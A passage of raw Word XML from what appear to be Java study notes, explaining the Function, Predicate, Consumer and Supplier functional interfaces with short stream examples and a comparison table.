      </w:r>
    </w:p>
    <w:p w14:paraId="61F9821E" w14:textId="0DFB36FE" w:rsidR="00AD4B5F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD4B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112851"/>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Lo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es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Welco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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F53BF" w14:textId="77777777" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="00172DF7" w:rsidP="00172DF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Function Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29B57E" w14:textId="77777777" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="0017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5199330"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Function</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getLength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st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p>
    <w:p w14:paraId="54247E09" w14:textId="77777777" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="0017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5199330"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17040241" w14:textId="77777777" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="0017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5199330"/>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pply</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ell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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F4685" w14:textId="6729F0D8" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="0017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5199330"/>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pply</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Welco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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE5911" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B36">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Real Use in Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A62598" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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name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To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Jonatha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my"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFCF98E" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEA569" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Predicate to filter names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C96DE" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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p>
    <w:p w14:paraId="43D4A7CD" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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il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edicate&lt;String&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036458E" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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orEach</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p>
    <w:p w14:paraId="4D172982" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA040AA" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Function to transform names to lengths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD6477" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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length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p>
    <w:p w14:paraId="1A64179A" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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Function&lt;String, Integer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA37DB" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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llec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ollecto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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D75EC" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581C224" w14:textId="4E01AC8E" w:rsidR="008D5FEC" w:rsidRPr="00CE4B95"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color w:val="880000"/>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3, 8, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F444B7" w14:textId="77777777" w:rsidR="008D5FEC" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5FEC" w:rsidP="007D2B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515A2DC9" w14:textId="02FCE1AC" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B36">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1"/>
        <w:gridCol w:w="1851"/>
        <w:gridCol w:w="1430"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="2FB24454" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9B5D7A" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625DC28C" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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redicate&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41FD5BA9" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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unction&lt;T, R&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="586E7B89" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64F40D80" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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put</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01B6D02E" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5D1EAB" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="40866693" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21861974" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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utput</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308B3316" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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oolean (true/false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67339274" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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 (any type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="5C496321" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F19E798" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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unctional Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FD6BC64" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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est(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C05F9B6" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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pply(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w14:paraId="6CA60955" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066CC2AE" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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eam Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="157550F3" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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lter()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AF358C" w14:textId="77777777" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B3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p()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D976E97" w14:textId="7E927FF0" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00936CAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="31A769CC">
          <v:rect id="_x0000_i1752" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA38166" w14:textId="27485952" w:rsidR="001A3A61" w:rsidRPr="00CE4B95" w:rsidRDefault="001A3A61">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc196307721"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Consumer and Supplier?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="17A7DE2E" w14:textId="19E2E7F3" w:rsidR="001A3A61" w:rsidRPr="00CE4B95" w:rsidRDefault="001A3A61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2937C242"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Consumer&lt;T&gt; – Takes input, returns nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B241BB7" w14:textId="2FF5197E"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651396" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Represents an operation that accepts a value and performs an action, but returns nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13482F19" w14:textId="68DFD1E2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651396" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>void accept(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53438FF9" w14:textId="6D83C682"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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651396" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logging, printing, modifying objects, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F71EA5" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9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1CAF5AB1" w14:textId="77777777" w:rsidR="00C95D5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00C95D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8737227"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumer</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gree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ello,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6FE855F5" w14:textId="3BFFB06D" w:rsidR="00C95D5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00C95D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8737227"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gre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ccep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Joh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 Hello, John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E98AE" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A0D9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113BDD4">
          <v:rect id="_x0000_i1753" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B42772"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Supplier&lt;T&gt; – Gives output, takes nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A3142" w14:textId="1A520526"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002825B1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Represents a function that supplies a value without any input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252079BC" w14:textId="579C4869"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thod:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002825B1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EAE315" w14:textId="2192DA89"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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002825B1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Providing default values, random numbers, object generation, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731688E6" w14:textId="77777777" w:rsidR="006A0D9E" w:rsidRPr="00CE4B95" w:rsidRDefault="006A0D9E" w:rsidP="006A0D9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73EEE2C7" w14:textId="77777777" w:rsidR="002825B1" w:rsidRPr="00CE4B95" w:rsidRDefault="002825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476126"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Supplier</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supply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nonymous"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548609DA" w14:textId="4E567FA1" w:rsidR="002825B1" w:rsidRPr="00CE4B95" w:rsidRDefault="002825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476126"/>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upplyName</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 Anonymous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
